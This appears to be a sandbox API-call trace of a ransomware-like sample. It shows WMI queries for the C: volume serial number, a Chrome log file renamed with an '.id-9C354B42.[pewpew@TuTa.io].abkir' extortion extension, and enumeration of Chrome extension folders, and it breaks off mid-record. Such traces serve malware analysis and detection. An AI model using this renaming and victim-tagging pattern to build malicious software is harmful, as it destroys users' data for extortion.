WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x949e698*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e694 | out: ppvObject=0x949e694*=0x6033584) returned 0x0 [0198.796] WbemLocator:IUnknown:AddRef (This=0x6033584) returned 0x4 [0198.796] WbemLocator:IUnknown:Release (This=0x6033584) returned 0x3 [0198.796] WbemLocator:IUnknown:Release (This=0x6033584) returned 0x2 [0198.796] SysStringLen (param_1=0x0) returned 0x0 [0198.796] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x949ea2c | out: puCount=0x949ea2c*=0x0) returned 0x0 [0198.796] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949ea28*=0x0, pszText=0x0 | out: puBuffLength=0x949ea28*=0x20, pszText=0x0) returned 0x0 [0198.796] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949ea28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.796] CoGetContextToken (in: pToken=0x949e698 | out: pToken=0x949e698) returned 0x0 [0198.796] WbemLocator:IUnknown:AddRef (This=0xb5af74) returned 0x3 [0198.796] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e52c | out: ppvObject=0x949e52c*=0xb5af74) returned 0x0 [0198.796] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x3 [0198.796] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x2 [0198.796] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949ea30*=0x0, pszText=0x0 | out: puBuffLength=0x949ea30*=0x20, pszText=0x0) returned 0x0 [0198.796] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949ea30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.796] IWbemServices:GetObject (in: This=0x6033584, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e9e4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e9e4*=0x6028648, ppCallResult=0x0) returned 0x0 [0198.809] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x949e9e4 | out: puCount=0x949e9e4*=0x2) returned 0x0 [0198.809] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x949e9e0*=0x0, pszText=0x0 | out: puBuffLength=0x949e9e0*=0xf, pszText=0x0) returned 0x0 [0198.809] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x949e9e0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9e0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.809] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3646f94*=0, plFlavor=0x3646f98*=0 | out: pVal=0x949e9e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3646f94*=8, plFlavor=0x3646f98*=0) returned 0x0 [0198.809] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.809] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.809] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3646f94*=8, plFlavor=0x3646f98*=0 | out: pVal=0x949e9e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3646f94*=8, plFlavor=0x3646f98*=0) returned 0x0 [0198.809] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.809] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.810] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", lpFilePart=0x0) returned 0x66 [0198.810] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x89 [0198.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea48) returned 1 [0198.810] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), fInfoLevelId=0x0, lpFileInformation=0x949eac4 | out: lpFileInformation=0x949eac4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82556720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x2ff18200, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0198.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea44) returned 1 [0198.810] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0198.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0198.811] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions", lpFilePart=0x0) returned 0x56 [0198.811] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\", lpFilePart=0x0) returned 0x57 [0198.811] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f950 [0199.326] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0199.326] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cf0550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cf0550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aapocclcgogkmnckokdopfmhonfmgoek", cAlternateFileName="AAPOCC~1")) returned 1 [0199.327] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x916d8210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x916d8210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aohghmighlieiainnegkcijnfilokake", cAlternateFileName="AOHGHM~1")) returned 1 [0199.327] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x819d0bd0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x916d8210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x916d8210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="apdfllckaahabafndbhieahigkjlhalf", cAlternateFileName="APDFLL~1")) returned 1 [0199.327] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81a42ff0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="blpcfgokakmgnkcojhhkbfbldkacnbeo", cAlternateFileName="BLPCFG~1")) returned 1 [0199.327] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x844bb8e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x844c0700, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x844c0700, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="felcaaldnbdncclmgdcncolpebgiejap", cAlternateFileName="FELCAA~1")) returned 1 [0199.328] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x862fc2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86322450, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86322450, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ghbmnnjooekpmoecnnnilnnbdlolhkhi", cAlternateFileName="GHBMNN~1")) returned 1 [0199.328] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ab7660, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82abeb90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82abeb90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nmmhkkegccagdldgiimedpiccmgmieda", cAlternateFileName="NMMHKK~1")) returned 1 [0199.328] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x814d6d00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pjkljhegncpnkpknbcohdijeoejaedia", cAlternateFileName="PJKLJH~1")) returned 1 [0199.328] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8399f510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x839a6a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x839a6a40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkedcjkdefgpdelpbcmbmeomcjbeemfm", cAlternateFileName="PKEDCJ~1")) returned 1 [0199.328] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8399f510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x839a6a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x839a6a40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkedcjkdefgpdelpbcmbmeomcjbeemfm", cAlternateFileName="PKEDCJ~1")) returned 0 [0199.328] FindClose (in: hFindFile=0xb7f950 | out: hFindFile=0xb7f950) returned 1 [0199.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0199.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0199.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0199.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions", lpFilePart=0x0) returned 0x56 [0199.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\", lpFilePart=0x0) returned 0x57 [0199.329] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f950 [0199.330] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0199.331] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cf0550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cf0550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aapocclcgogkmnckokdopfmhonfmgoek", cAlternateFileName="AAPOCC~1")) returned 1 [0199.331] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x916d8210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x916d8210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aohghmighlieiainnegkcijnfilokake", cAlternateFileName="AOHGHM~1")) returned 1 [0199.331] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x819d0bd0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x916d8210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x916d8210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="apdfllckaahabafndbhieahigkjlhalf", cAlternateFileName="APDFLL~1")) returned 1 [0199.331] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81a42ff0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="blpcfgokakmgnkcojhhkbfbldkacnbeo", cAlternateFileName="BLPCFG~1")) returned 1 [0199.331] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x844bb8e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x844c0700, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x844c0700, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="felcaaldnbdncclmgdcncolpebgiejap", cAlternateFileName="FELCAA~1")) returned 1 [0199.331] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x862fc2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86322450, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86322450, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ghbmnnjooekpmoecnnnilnnbdlolhkhi", cAlternateFileName="GHBMNN~1")) returned 1 [0199.331] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ab7660, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82abeb90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82abeb90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nmmhkkegccagdldgiimedpiccmgmieda", cAlternateFileName="NMMHKK~1")) returned 1 [0199.331] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x814d6d00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pjkljhegncpnkpknbcohdijeoejaedia", cAlternateFileName="PJKLJH~1")) returned 1 [0199.332] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8399f510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x839a6a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x839a6a40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkedcjkdefgpdelpbcmbmeomcjbeemfm", cAlternateFileName="PKEDCJ~1")) returned 1 [0199.332] FindNextFileW (in: hFindFile=0xb7f950, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0199.332] FindClose (in: hFindFile=0xb7f950 | out: hFindFile=0xb7f950) returned 1 [0199.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0199.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0199.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb3c) returned 1 [0199.333] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek", nBufferLength=0x105, lpBuffer=0x949e644, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek", lpFilePart=0x0) returned 0x77 [0199.333] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\", nBufferLength=0x105, lpBuffer=0x949e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\", lpFilePart=0x0) returned 0x78 [0199.333] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*", lpFindFileData=0x949e864 | out: lpFindFileData=0x949e864*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cf0550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cf0550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f4d0 [0201.022] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x949e874 | out: lpFindFileData=0x949e874*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cf0550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cf0550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.022] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x949e874 | out: lpFindFileData=0x949e874*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0.9_0", cAlternateFileName="")) returned 1 [0201.022] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x949e874 | out: lpFindFileData=0x949e874*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 